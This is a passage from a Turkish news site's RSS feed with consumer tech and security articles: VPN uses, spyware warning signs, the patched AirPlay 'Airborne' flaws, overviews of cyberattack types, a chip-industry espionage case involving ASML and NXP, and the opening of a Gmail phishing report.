<p data-start="1235" data-end="1564" class=""><strong data-start="1235" data-end="1283">Coğrafi kısıtlamaları ve sansürü aşma imkânı</strong><br data-start="1283" data-end="1286">Netflix, BBC iPlayer ve YouTube gibi platformlarda yalnızca belirli ülkelerde erişime açık olan içeriklere VPN aracılığıyla başka bir ülkedeymiş gibi bağlanılarak ulaşılabilir. Ayrıca VPN’ler, bazı ülkelerde engellenmiş veya sansürlenmiş sitelere erişimi de mümkün hale getirir.</p>
<p data-start="1566" data-end="1811" class=""><strong data-start="1566" data-end="1612">İnternet servis sağlayıcılarından gizlilik</strong><br data-start="1612" data-end="1615">VPN’ler, kullanıcının ziyaret ettiği sitelerin internet servis sağlayıcısı (ISS) tarafından görüntülenmesini engeller. Bu sayede kullanıcılar internette daha özgür ve özel bir şekilde dolaşabilir.</p>
<p data-start="1813" data-end="2207" class=""><strong data-start="1813" data-end="1843">Kullanıma uygun VPN seçimi</strong><br data-start="1843" data-end="1846">VPN hizmetleri kullanım amacına göre çeşitlilik göstermektedir. Film ve dizi izlemek isteyen kullanıcılar için ExpressVPN ve Surfshark gibi servisler önerilirken, daha çok güvenlik ve gizliliğe odaklananlar için ProtonVPN veya Mullvad gibi hizmetler öne çıkmaktadır. Sansürlü sitelere erişim için ise Psiphon veya Outline gibi alternatif çözümler sunulmaktadır.</p>
<p data-start="2209" data-end="2380" class=""><strong data-start="2209" data-end="2221"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Telefon Kameranız Sizi Gizlice İzliyor Olabilir: Casus Yazılımlara Karşı Alınması Gereken Önlemler</title>
            <link>https://cumha.com.tr/telefon-kameraniz-sizi-gizlice-izliyor-olabilir-casus-yazilimlara-karsi-alinmasi-gereken-onlemler</link>
            <guid>https://cumha.com.tr/telefon-kameraniz-sizi-gizlice-izliyor-olabilir-casus-yazilimlara-karsi-alinmasi-gereken-onlemler</guid>
            <description><![CDATA[ Akıllı telefon kameraları kullanıcı izni olmadan çalışmazken, güvenilir olmayan uygulamalar aracılığıyla cihazlara sızan casus yazılımlar gizli çekim yapabiliyor. Peki, bunu nasıl anlarsınız ve nasıl korunabilirsiniz? İşte bilmeniz gerekenler. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6814722c5532a.webp" length="29242" type="image/webp"/>
            
            <pubDate>Fri, 02 May 2025 10:20:21 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Casus yazılım telefonda nasıl anlaşılır, iPhone kamera simgesi ne anlama gelir, Google Play Protect nasıl çalışır, güvenilir uygulama nasıl anlaşılır</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="384" data-end="788" class=""><strong data-start="384" data-end="453">İşletim sistemleri kamera erişimine izin istemeden olanak tanımaz</strong><br data-start="453" data-end="456">Android ve iOS işletim sistemleri, bir uygulamanın kamera kullanabilmesi için kullanıcıdan açık izin almasını şart koşar. Kamera kullanıldığında genellikle iPhone’larda görüldüğü gibi ekranda yeşil ya da turuncu bir simge belirir. Bu göstergeler, kamera ve mikrofon erişimlerinin sistem tarafından izlendiğini kanıtlar niteliktedir.</p>
<p data-start="790" data-end="1094" class=""><strong data-start="790" data-end="830">Casus yazılımlar güvenlik açığı arar</strong><br data-start="830" data-end="833">Bununla birlikte, özellikle resmi mağaza dışından indirilen APK dosyaları gibi uygulamalar cihazlara sızarak, güvenlik açıklarını kullanabilir. Bu yazılımlar arka planda gizlice kamera erişimi sağlayabilir ve kullanıcı farkında olmadan görüntüler toplanabilir.</p>
<p data-start="1096" data-end="1446" class=""><strong data-start="1096" data-end="1143">Casus yazılım bulaştığını nasıl anlarsınız?</strong><br data-start="1143" data-end="1146">Cihazın kamerasının ya da flaşının kendi kendine açılması, belirgin bir uyarı işaretidir. Ayrıca, bilinmeyen uygulamaların arka planda sürekli çalışması, veri kullanımında beklenmeyen artışlar yaşanması ve cihazın olağandışı şekilde ısınması, potansiyel bir casus yazılımın varlığına işaret edebilir.</p>
<p data-start="1448" data-end="2087" class=""><strong data-start="1448" data-end="1487">Korunmak için alınabilecek önlemler</strong><br data-start="1487" data-end="1490">Casus yazılımlardan korunmak için yalnızca Google Play Store veya App Store gibi resmi kaynaklardan uygulama indirilmesi öneriliyor. Uygulama yüklemeden önce kullanıcı yorumlarına dikkat edilmeli ve geliştirici bilgisi kontrol edilmelidir. Cihaz ayarlarında yer alan kamera erişim izinleri düzenli olarak gözden geçirilmeli, ihtiyaç dışı izinler kapatılmalıdır. Ayrıca, Android cihazlarda Google Play Protect hizmeti aktif tutulmalı, iPhone kullanıcıları ise ‘Uygulama Takibi Şeffaflığı’ özelliğini açık tutmalıdır. Güçlü bir mobil antivirüs uygulaması kullanmak da ek bir güvenlik katmanı sağlar.</p>
<p data-start="2089" data-end="2251" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>AirPlay protokolünde kritik açık: Apple kapattı, üçüncü parti cihazlar hâlâ risk altında</title>
            <link>https://cumha.com.tr/airplay-protokolunde-kritik-acik-apple-kapatti-ucuncu-parti-cihazlar-hala-risk-altinda</link>
            <guid>https://cumha.com.tr/airplay-protokolunde-kritik-acik-apple-kapatti-ucuncu-parti-cihazlar-hala-risk-altinda</guid>
            <description><![CDATA[ Apple&#039;ın AirPlay sisteminde tespit edilen 23 farklı güvenlik açığı büyük ölçüde kapatıldı ancak üçüncü taraf cihazlar için tehlike sürüyor. Araştırmacılar, bu açıkların casusluktan fidye yazılıma kadar birçok saldırıya kapı aralayabileceğini belirtiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_681216756f24a.webp" length="2612" type="image/webp"/>
            
            <pubDate>Wed, 30 Apr 2025 15:24:28 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>AirPlay açığı hangi cihazları etkiliyor, Apple güvenlik açıklarını kapattı mı, üçüncü taraf cihazlar için tehlike devam ediyor mu, AirPlay nasıl daha güvenli hale getirilebilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="394" data-end="397"><strong data-start="397" data-end="459">AirPlay protokolünde ciddi güvenlik açıkları tespit edildi</strong><br data-start="459" data-end="462">Apple’ın medya paylaşım teknolojisi AirPlay, yakın zamanda güvenlik araştırmacıları tarafından mercek altına alındı. Oligo tarafından yapılan incelemelerde AirPlay protokolü ve geliştirme kitinde 23 ayrı güvenlik açığı belirlendi. Bu açıklar, bir cihazın ağ üzerindeki diğer cihazlara bulaşmasına neden olabilecek bir "giriş noktası" oluşturuyor.</p>
<p></p>
<p data-start="810" data-end="1210" class=""><strong data-start="810" data-end="852">Apple, kendi cihazları için önlem aldı</strong><br data-start="852" data-end="855">Şirket, son birkaç ayda yayınladığı güncellemelerle bu açıkları büyük oranda giderdi. Apple ayrıca, AirPlay yazılım geliştirme kitini (SDK) kullanan üçüncü taraf üreticilere yönelik de düzeltmeler yayınladı. Buna rağmen Apple dışı cihazların büyük bölümünde güncellemelerin uygulanmamış olabileceği ve bu cihazların halen savunmasız olduğu ifade ediliyor.</p>
<p data-start="1212" data-end="1651" class=""><strong data-start="1212" data-end="1268">Airborne adı verilen saldırı tipi büyük risk taşıyor</strong><br data-start="1268" data-end="1271">Airborne olarak adlandırılan bu güvenlik açığı, saldırganların AirPlay destekli cihazların kontrolünü ele geçirmesine imkân tanıyor. Bu kontrol, aynı Wi-Fi ağı içinde bulunan cihazlara kötü amaçlı yazılım yaymak için kullanılabiliyor. Araştırmacılar, bu zafiyetin casusluk, fidye yazılımı, tedarik zinciri saldırıları ve diğer karmaşık tehditlere kapı aralayabileceğini aktarıyor.</p>
<p data-start="1653" data-end="2126" class=""><strong data-start="1653" data-end="1701">Kullanıcılara güncelleme ve güvenlik uyarısı</strong><br data-start="1701" data-end="1704">Güvenlik açığı, Uzaktan Kod Yürütme (RCE), Hizmet Reddi (DoS), Aracı Saldırı (MITM) gibi çeşitli yöntemlerle kullanılabiliyor. Kullanıcı etkileşimi gerektirmeden çalışabilen bu açıklar zincirleme biçimde de istismar edilebiliyor. Uzmanlar, AirPlay’in herkese açık şekilde yapılandırılmaması gerektiğini vurgularken, özellikle halka açık Wi-Fi ağlarına bağlanan kullanıcıların daha dikkatli olmaları gerektiği belirtiliyor.</p>
<p data-start="2128" data-end="2448" class=""><strong data-start="2128" data-end="2160">Apple ile iş birliği yapıldı</strong><br data-start="2160" data-end="2163">Apple’ın, güvenlik açıklarını Oligo ile birlikte çalışarak tespit edip giderdiği bildirildi. Ancak güvenlik uzmanları, üçüncü taraf AirPlay cihazlarında tehditlerin halen geçerli olduğunu ve bu nedenle güncelleme yapılmamış cihazların kullanılmasının risk teşkil ettiğini ifade ediyor.</p>
<p data-start="2450" data-end="2645" class=""><strong data-start="2450" data-end="2462"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Her 39 Saniyede Bir Gerçekleşiyor: Siber Saldırılar Dijital Düzeni Tehdit Ediyor</title>
            <link>https://cumha.com.tr/her-39-saniyede-bir-gerceklesiyor-siber-saldirilar-dijital-duzeni-tehdit-ediyor</link>
            <guid>https://cumha.com.tr/her-39-saniyede-bir-gerceklesiyor-siber-saldirilar-dijital-duzeni-tehdit-ediyor</guid>
            <description><![CDATA[ Finansal kazançtan casusluğa, hacktivizmden sabotaja kadar pek çok amaçla gerçekleştirilen siber saldırılar; bireylerden devletlere kadar herkesi hedef alıyor. Uzmanlara göre en büyük tehdit içeriden geliyor, korunmak için farkındalık şart. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_6811fc07f24d5.webp" length="28394" type="image/webp"/>
            
            <pubDate>Wed, 30 Apr 2025 13:31:49 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Siber saldırılar hangi amaçlarla yapılır, en yaygın saldırı türleri nelerdir, bireyler ve kurumlar siber saldırılara karşı nasıl korunabilir, Türkiye&#039;deki yasal düzenlemeler nelerdir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="381" data-end="813" class=""><strong data-start="381" data-end="425">Siber saldırılar nedir ve neden yapılır?</strong><br data-start="425" data-end="428">Siber saldırı, dijital sistemlere, ağlara, bilgisayarlara, sunuculara, mobil cihazlara veya genel olarak bilgi altyapılarına yönelik kötü niyetli müdahaleleri tanımlamak için kullanılan bir terimdir. Bu saldırılar; veri hırsızlığı, hizmet kesintisi, sistemlerin devre dışı bırakılması, kullanıcı manipülasyonu ya da maddi ve manevi zarar verme gibi çeşitli hedeflerle gerçekleştirilir.</p>
<p data-start="815" data-end="1127" class="">Siber saldırıların amaçları farklılık gösterir. Bazı saldırılar finansal kazanç hedeflerken, bazıları istihbarat elde etmeyi, altyapıları sabote etmeyi ya da politik mesajlar vermeyi amaçlar. Hacker grupları zaman zaman sadece yeteneklerini sergilemek veya prestij kazanmak amacıyla da saldırılar düzenleyebilir.</p>
<p data-start="1129" data-end="1259" class=""><strong data-start="1129" data-end="1164">En yaygın siber saldırı türleri</strong><br data-start="1164" data-end="1167">Siber saldırılar teknik ve psikolojik birçok yöntemi içerir. Bunların başlıcaları şunlardır:</p>
<ul data-start="1261" data-end="2045">
<li data-start="1261" data-end="1422" class="">
<p data-start="1263" data-end="1422" class=""><strong data-start="1263" data-end="1300">Kötü Amaçlı Yazılımlar (Malware):</strong> Virüs, truva atı, solucan, casus yazılım gibi yazılımlar sisteme bulaşarak veri çalar veya sistemi işler hale getirilmez.</p>
</li>
<li data-start="1423" data-end="1517" class="">
<p data-start="1425" data-end="1517" class=""><strong data-start="1425" data-end="1460">Fidye Yazılımları (Ransomware):</strong> Veriler şifrelenir ve çözülmesi için fidye talep edilir.</p>
</li>
<li data-start="1518" data-end="1629" class="">
<p data-start="1520" data-end="1629" class=""><strong data-start="1520" data-end="1544">Phishing (Oltalama):</strong> Sahte e-postalar veya sitelerle kullanıcıdan şifre gibi hassas bilgiler elde edilir.</p>
</li>
<li data-start="1630" data-end="1735" class="">
<p data-start="1632" data-end="1735" class=""><strong data-start="1632" data-end="1653">DDoS Saldırıları:</strong> Bir internet sitesine aşırı trafik gönderilerek hizmet dışı bırakılması sağlanır.</p>
</li>
<li data-start="1736" data-end="1840" class="">
<p data-start="1738" data-end="1840" class=""><strong data-start="1738" data-end="1768">Sıfırıncı Gün Saldırıları:</strong> Henüz fark edilmemiş güvenlik açıkları kullanılarak sistemlere sızılır.</p>
</li>
<li data-start="1841" data-end="1952" class="">
<p data-start="1843" data-end="1952" class=""><strong data-start="1843" data-end="1872">İçeriden Gelen Tehditler:</strong> Kurum içinden bir çalışanın istemli veya istemsiz olarak sisteme zarar vermesi.</p>
</li>
<li data-start="1953" data-end="2045" class="">
<p data-start="1955" data-end="2045" class=""><strong data-start="1955" data-end="1978">Sosyal Mühendislik:</strong> İnsanların kandırılarak bilgilerini paylaşmalarının sağlanmasıdır.</p>
</li>
</ul>
<p data-start="2047" data-end="2412" class=""><strong data-start="2047" data-end="2084">Siber saldırıların etkileri büyük</strong><br data-start="2084" data-end="2087">Saldırılar sonucunda ciddi veri kayıpları yaşanabilir, kişisel bilgiler çalınabilir, şirketler milyonlarca lira zarar edebilir. Kamu kurumları ve altyapılar hedef alındığında hizmet kesintileri ve hatta ulusal güvenlik tehditleri ortaya çıkabilir. Özellikle itibar kaybı, birçok kurum için geri dönülmez sonuçlar doğurabilir.</p>
<p data-start="2414" data-end="2749" class=""><strong data-start="2414" data-end="2461">Korunmak için bireysel ve kurumsal önlemler</strong><br data-start="2461" data-end="2464">Siber saldırılara karşı korunmak için bazı temel önlemlerin alınması gerekiyor. Bireysel olarak güçlü şifreler kullanmak, iki faktörlü kimlik doğrulama tercih etmek, güncel antivirüs yazılımları kullanmak ve sahte e-postalara karşı dikkatli olmak öncelikli adımlar arasında yer alıyor.</p>
<p data-start="2751" data-end="2974" class="">Kurumlar için ise güvenlik duvarları, saldırı tespit sistemleri, personel eğitimi, düzenli veri yedekleme ve sızma testleri hayati önem taşıyor. Ayrıca, risk analizleri ile güvenlik açıklarının erken tespiti sağlanabiliyor.</p>
<p data-start="2976" data-end="3368" class=""><strong data-start="2976" data-end="3015">Siber güvenlikte yasal düzenlemeler</strong><br data-start="3015" data-end="3018">Türkiye'de siber suçlarla mücadelede çeşitli hukuki düzenlemeler mevcut. Türk Ceza Kanunu’nun 243 ila 245. maddeleri, bilişim sistemlerine yönelik suçları kapsarken; Kişisel Verilerin Korunması Kanunu (KVKK), veri güvenliğine dair yükümlülükleri belirliyor. Ayrıca 5651 Sayılı Kanun da internet ortamında işlenen suçlara yönelik önlemleri düzenliyor.</p>
<p data-start="3370" data-end="3684" class=""><strong data-start="3370" data-end="3408">Siber farkındalık artık zorunluluk</strong><br data-start="3408" data-end="3411">Uzmanlar, siber güvenliğin sadece teknik bir konu olmadığını, aynı zamanda toplumsal bir bilinç ve kültür meselesi olduğunu belirtiyor. Bu nedenle hem bireylerin hem kurumların dijital okuryazarlık düzeyini artırması ve siber tehditlere karşı hazırlıklı olması gerekiyor.</p>
<p data-start="3686" data-end="3887" class=""><strong data-start="3686" data-end="3698"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber güvenlik sadece hacker tehdidi değil, dijital hayatın tamamını ilgilendiren kritik bir savunma alanı</title>
            <link>https://cumha.com.tr/siber-guvenlik-sadece-hacker-tehdidi-degil-dijital-hayatin-tamamini-ilgilendiren-kritik-bir-savunma-alani</link>
            <guid>https://cumha.com.tr/siber-guvenlik-sadece-hacker-tehdidi-degil-dijital-hayatin-tamamini-ilgilendiren-kritik-bir-savunma-alani</guid>
            <description><![CDATA[ Siber güvenlik yalnızca virüs veya hacker saldırılarına karşı koruma sağlamakla kalmaz; bireylerin, kurumların ve devletlerin dijital verilerini koruyarak gizliliği, bütünlüğü ve erişilebilirliği güvence altına alır. Bu alanda yapay zeka, IoT ve kuantum gibi yeni nesil teknolojilerle tehditler de önlemler de sürekli evrim geçirmektedir. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_6811fb7b15ba0.webp" length="32014" type="image/webp"/>
            
            <pubDate>Wed, 30 Apr 2025 13:29:33 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Siber güvenlik neden sadece teknik bir konu değildir, en yaygın siber saldırı türleri nelerdir, siber güvenlik uzmanı nasıl olunur, devletler dijital güvenliği nasıl sağlıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="489" data-end="929" class=""><strong data-start="489" data-end="514">Siber güvenlik nedir?</strong><br data-start="514" data-end="517">Siber güvenlik, dijital dünyada yer alan tüm bilgi sistemlerinin, ağların, yazılımların, cihazların ve verilerin kötü niyetli saldırılardan, yetkisiz erişimlerden ve bozulmalardan korunmasını amaçlayan disiplinler arası bir alandır. Hem bireysel hem de kurumsal düzeyde uygulanması gereken bu güvenlik önlemleri, günümüzde devletlerin ulusal güvenlik stratejilerinin de temel parçalarından biri haline gelmiştir.</p>
<p data-start="931" data-end="1055" class=""><strong data-start="931" data-end="981">Siber güvenliğin temel prensipleri: CIA üçgeni</strong><br data-start="981" data-end="984">Bu alandaki tüm politikaların temelini oluşturan üç ana hedef vardır:</p>
<ul data-start="1056" data-end="1360">
<li data-start="1056" data-end="1150" class="">
<p data-start="1058" data-end="1150" class=""><strong data-start="1058" data-end="1089">Gizlilik (Confidentiality):</strong> Verilere yalnızca yetkili kişilerin erişebilmesini sağlar.</p>
</li>
<li data-start="1151" data-end="1249" class="">
<p data-start="1153" data-end="1249" class=""><strong data-start="1153" data-end="1178">Bütünlük (Integrity):</strong> Bilgiye yetkisiz müdahaleleri önleyerek verilerin doğruluğunu korur.</p>
</li>
<li data-start="1250" data-end="1360" class="">
<p data-start="1252" data-end="1360" class=""><strong data-start="1252" data-end="1287">Erişilebilirlik (Availability):</strong> Bilgilere ihtiyaç duyulduğunda kesintisiz erişimi güvence altına alır.</p>
</li>
</ul>
<p data-start="1362" data-end="1520" class=""><strong data-start="1362" data-end="1399">Karşılaşılan siber tehdit türleri</strong><br data-start="1399" data-end="1402">Siber tehditler zamanla daha karmaşık hale gelirken, en sık karşılaşılan tehdit başlıkları şu şekilde sıralanabilir:</p>
<ul data-start="1521" data-end="2088">
<li data-start="1521" data-end="1642" class="">
<p data-start="1523" data-end="1642" class=""><strong data-start="1523" data-end="1559">Kötü amaçlı yazılımlar (malware)</strong>: Virüs, solucan, truva atı, casus yazılım ve fidye yazılımı gibi türleri içerir.</p>
</li>
<li data-start="1643" data-end="1737" class="">
<p data-start="1645" data-end="1737" class=""><strong data-start="1645" data-end="1679">Fidye yazılımları (ransomware)</strong>: Dosyaları şifreleyerek açılması için fidye talep eder.</p>
</li>
<li data-start="1738" data-end="1843" class="">
<p data-start="1740" data-end="1843" class=""><strong data-start="1740" data-end="1763">Oltalama (phishing)</strong>: Kullanıcıları kandırarak kişisel bilgilerini çalmaya yönelik sahte iletiler.</p>
</li>
<li data-start="1844" data-end="1925" class="">
<p data-start="1846" data-end="1925" class=""><strong data-start="1846" data-end="1867">DDoS saldırıları:</strong> Sistemlere aşırı trafik göndererek hizmet dışı bırakır.</p>
</li>
<li data-start="1926" data-end="2005" class="">
<p data-start="1928" data-end="2005" class=""><strong data-start="1928" data-end="1951">Sıfır gün açıkları:</strong> Henüz çözümü olmayan yazılım açıklarının istismarı.</p>
</li>
<li data-start="2006" data-end="2088" class="">
<p data-start="2008" data-end="2088" class=""><strong data-start="2008" data-end="2025">İç tehditler:</strong> Çalışan kaynaklı kasıtlı ya da dikkatsiz güvenlik ihlalleri.</p>
</li>
</ul>
<p data-start="2090" data-end="2232" class=""><strong data-start="2090" data-end="2142">Korunma yöntemleri ve siber savunma stratejileri</strong><br data-start="2142" data-end="2145">Siber saldırılara karşı önlem almak için çeşitli teknik ve idari yöntemler uygulanır:</p>
<ul data-start="2233" data-end="2469">
<li data-start="2233" data-end="2268" class="">
<p data-start="2235" data-end="2268" class="">Antivirüs ve güvenlik duvarları</p>
</li>
<li data-start="2269" data-end="2295" class="">
<p data-start="2271" data-end="2295" class="">Verilerin şifrelenmesi</p>
</li>
<li data-start="2296" data-end="2329" class="">
<p data-start="2298" data-end="2329" class="">Çok faktörlü kimlik doğrulama</p>
</li>
<li data-start="2330" data-end="2361" class="">
<p data-start="2332" data-end="2361" class="">Güncelleme ve yama yönetimi</p>
</li>
<li data-start="2362" data-end="2408" class="">
<p data-start="2364" data-end="2408" class="">Penetrasyon testleri ve zafiyet analizleri</p>
</li>
<li data-start="2409" data-end="2469" class="">
<p data-start="2411" data-end="2469" class="">Çalışanlara sosyal mühendislik ve farkındalık eğitimleri</p>
</li>
</ul>
<p data-start="2471" data-end="2600" class=""><strong data-start="2471" data-end="2519">Siber güvenlik kariyerinde uzmanlık alanları</strong><br data-start="2519" data-end="2522">Bu alanda kariyer yapmak isteyenler için birçok uzmanlık dalı bulunmaktadır:</p>
<ul data-start="2601" data-end="2748">
<li data-start="2601" data-end="2626" class="">
<p data-start="2603" data-end="2626" class="">Siber güvenlik uzmanı</p>
</li>
<li data-start="2627" data-end="2642" class="">
<p data-start="2629" data-end="2642" class="">Etik hacker</p>
</li>
<li data-start="2643" data-end="2667" class="">
<p data-start="2645" data-end="2667" class="">Olay müdahale uzmanı</p>
</li>
<li data-start="2668" data-end="2691" class="">
<p data-start="2670" data-end="2691" class="">Adli bilişim uzmanı</p>
</li>
<li data-start="2692" data-end="2713" class="">
<p data-start="2694" data-end="2713" class="">Güvenlik analisti</p>
</li>
<li data-start="2714" data-end="2748" class="">
<p data-start="2716" data-end="2748" class="">Siber tehdit istihbarat uzmanı</p>
</li>
</ul>
<p data-start="2750" data-end="2867" class="">Sektöre girmek isteyen kişilerin bilgi güvenliği, ağ yönetimi ve programlama konularında yetkin olması gerekmektedir.</p>
<p data-start="2869" data-end="3186" class=""><strong data-start="2869" data-end="2921">Kurumsal ve ulusal düzeyde güvenlik politikaları</strong><br data-start="2921" data-end="2924">Kurumlar, sadece teknolojik önlemlerle değil; aynı zamanda güvenlik politikaları, farkındalık eğitimleri ve felaket kurtarma planlarıyla da koruma sağlar. Türkiye'de ise BTK, TÜBİTAK, USOM ve Savunma Sanayii Başkanlığı gibi kurumlar siber güvenlikten sorumludur.</p>
<p data-start="3188" data-end="3499" class=""><strong data-start="3188" data-end="3235">Geleceğin tehditleri ve adaptasyon ihtiyacı</strong><br data-start="3235" data-end="3238">Yapay zeka, nesnelerin interneti (IoT), 5G ve kuantum bilgisayarların yaygınlaşmasıyla birlikte siber tehditlerin hem şekli hem de etkisi değişmektedir. Bu nedenle siber güvenlik çözümleri sürekli güncellenmeli, bireyler ve kurumlar bu evrime ayak uydurmalıdır.</p>
<p data-start="3501" data-end="3690" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Çip devlerine sızdı, 193 gizli belgeyle Rusya’ya veri aktardı: Avrupa merkezli casusluk operasyonu ifşa oldu</title>
            <link>https://cumha.com.tr/cip-devlerine-sizdi-193-gizli-belgeyle-rusyaya-veri-aktardi-avrupa-merkezli-casusluk-operasyonu-ifsa-oldu</link>
            <guid>https://cumha.com.tr/cip-devlerine-sizdi-193-gizli-belgeyle-rusyaya-veri-aktardi-avrupa-merkezli-casusluk-operasyonu-ifsa-oldu</guid>
            <description><![CDATA[ ASML ve NXP gibi dev yarı iletken firmalarının içinde görev alarak yüzlerce gizli çip üretim dosyasını sızdıran Rus vatandaşı German A., istihbarat raporlarıyla gün yüzüne çıkan çok uluslu casusluk operasyonunun merkezinde yer aldı. 28nm çip teknolojisinin Rusya’ya taşınması, askeri ve endüstriyel teknoloji transferi açısından büyük endişe yarattı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_6811c8b7a130d.webp" length="41522" type="image/webp"/>
            
            <pubDate>Wed, 30 Apr 2025 09:52:57 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>German A. hangi firmalardan bilgi sızdırdı, çalınan belgeler ne içeriyor, Rusya’da çip fabrikası kurma planı ne durumda, German A. nasıl yakalandı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="493" data-end="1056" class=""><strong data-start="514" data-end="578">Avrupa'nın yarı iletken devlerine sızan Rus ajan ifşa edildi</strong><br data-start="578" data-end="581">Hollanda merkezli litografi üreticisi ASML ile yarı iletken firması NXP, geniş çaplı bir casusluk vakasıyla karşı karşıya kaldı. Hollanda istihbarat birimlerinin Ağustos 2024 tarihli raporuna göre, 43 yaşındaki Rus vatandaşı German A., çok sayıda hassas veriyi Rusya’ya aktarmakla suçlanıyor. Casusluk faaliyetinin, Batı ülkelerinin uyguladığı teknoloji ambargoları altında modern çip üretimine erişimi kısıtlanan Rusya’nın kapasitesini artırmaya yönelik olduğu belirtiliyor.</p>
<p data-start="1058" data-end="1558" class=""><strong data-start="1058" data-end="1112">Belgeler 28nm üretim için kritik bilgiler içeriyor</strong><br data-start="1112" data-end="1115">Soruşturmalara göre German A., ASML, TSMC, NXP ve GlobalFoundries gibi önde gelen firmalardan toplamda 193 iç doküman çaldı. Belgelerin, doğrudan tam teşekküllü bir üretim tesisi kurulması için yeterli olmadığı belirtilse de, çip üretim süreçlerinin detaylarına dair önemli teknik bilgiler içerdiği ifade edildi. Özellikle 28nm üretim teknolojisine ilişkin verilerin Rusya’ya ulaştığı ve askeri-endüstriyel alanda kullanılabileceği vurgulandı.</p>
<p data-start="1560" data-end="1874" class=""><strong data-start="1560" data-end="1609">Bulut servisleri ve USB bellekle veri aktardı</strong><br data-start="1609" data-end="1612">German A.'nın elde ettiği verileri Moskova'ya çeşitli dijital yöntemlerle ilettiği belirlendi. Bunlar arasında bulut depolama sistemleri, mesajlaşma uygulamaları ve USB bellekler yer alıyor. Bu operasyon karşılığında yaklaşık 40 bin avro kazandığı öne sürülüyor.</p>
<p data-start="1876" data-end="2449" class=""><strong data-start="1876" data-end="1928">Almanya, Belçika ve Hollanda'da yıllarca çalıştı</strong><br data-start="1928" data-end="1931">Casusluk faaliyetleri, German A.’nın Avrupa’daki teknoloji firmalarında yıllar boyunca elde ettiği pozisyonlar sayesinde gerçekleşti. 2008’de Belçika’da başlayan kariyerinde Yunanistan, Almanya ve Hollanda'daki yarı iletken firmalarında çalıştı. 2020 yılında ASML'de erişim izni olmadan bazı belgelere ulaştığı tespit edildi ancak güvenlik sistemleri bunu zamanında fark edemedi. 2021’de ASML'den ayrıldıktan sonra 2022’de NXP’de geçici bir iş aldı. Aynı yıl, çip üretiminde kullanılan CVD cihazı satın almaya çalıştı.</p>
<p data-start="2451" data-end="2868" class=""><strong data-start="2451" data-end="2505">2023’te Rusya ile temasa geçti, 2024’te tutuklandı</strong><br data-start="2505" data-end="2508">Eski eşinin ifadesine göre 2023’ün sonlarında Rus araştırmacılarla iletişime geçen German A., Rusya’da 28nm üretim kapasitesine sahip bir fabrika kurma planlarına katıldı. Hollanda istihbaratının raporuna göre Ağustos 2024’te tutuklandı. Hakkında 18 ila 32 ay arası hapis cezası isteniyor. ASML ve NXP, bu olay sonrası German A. hakkında hukuki süreç başlattı.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google altyapısındaki açık, Gmail kullanıcılarını sahte 'mahkeme' e-postalarıyla hedef aldı</title>
            <link>https://cumha.com.tr/google-altyapisindaki-acik-gmail-kullanicilarini-sahte-mahkeme-e-postalariyla-hedef-aldi</link>
            <guid>https://cumha.com.tr/google-altyapisindaki-acik-gmail-kullanicilarini-sahte-mahkeme-e-postalariyla-hedef-aldi</guid>
            <description><![CDATA[ Gmail kullanıcıları, Google altyapısındaki bir güvenlik açığından faydalanılarak hazırlanan ve resmi görünümlü mahkeme bildirimiyle kandırılmaya çalışıldı. Şirket, saldırının farkında olduklarını ve açığın kapatıldığını duyurdu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_680b5598e045c.webp" length="18880" type="image/webp"/>
            
            <pubDate>Fri, 25 Apr 2025 12:27:59 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Google kimlik avı saldırısında nasıl bir açık kullanıldı, Gmail kullanıcıları hangi yöntemle hedef alındı, sahte e-postaların ayırt edilmesi için ne yapılmalı, Google kullanıcıları nasıl uyardı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="376" data-end="379"><strong data-start="379" data-end="449">Gmail kullanıcıları yeni bir kimlik avı tehlikesiyle karşı karşıya</strong><br data-start="449" data-end="452">Teknoloji şirketi Google, milyarlarca kişinin kullandığı Gmail platformu için ciddi bir güvenlik uyarısında bulundu. Uyarı, yazılım geliştirici Nick Johnson’ın sosyal medyada yaşadığı bir dolandırıcılık tecrübesini paylaşmasının ardından gündeme geldi. Johnson, Google’dan geldiğini düşündüğü bir e-postanın aslında sahte olduğunu ve bu mesajın Gmail güvenlik kontrollerini geçecek kadar inandırıcı şekilde tasarlandığını açıkladı.</p>
<p></p>
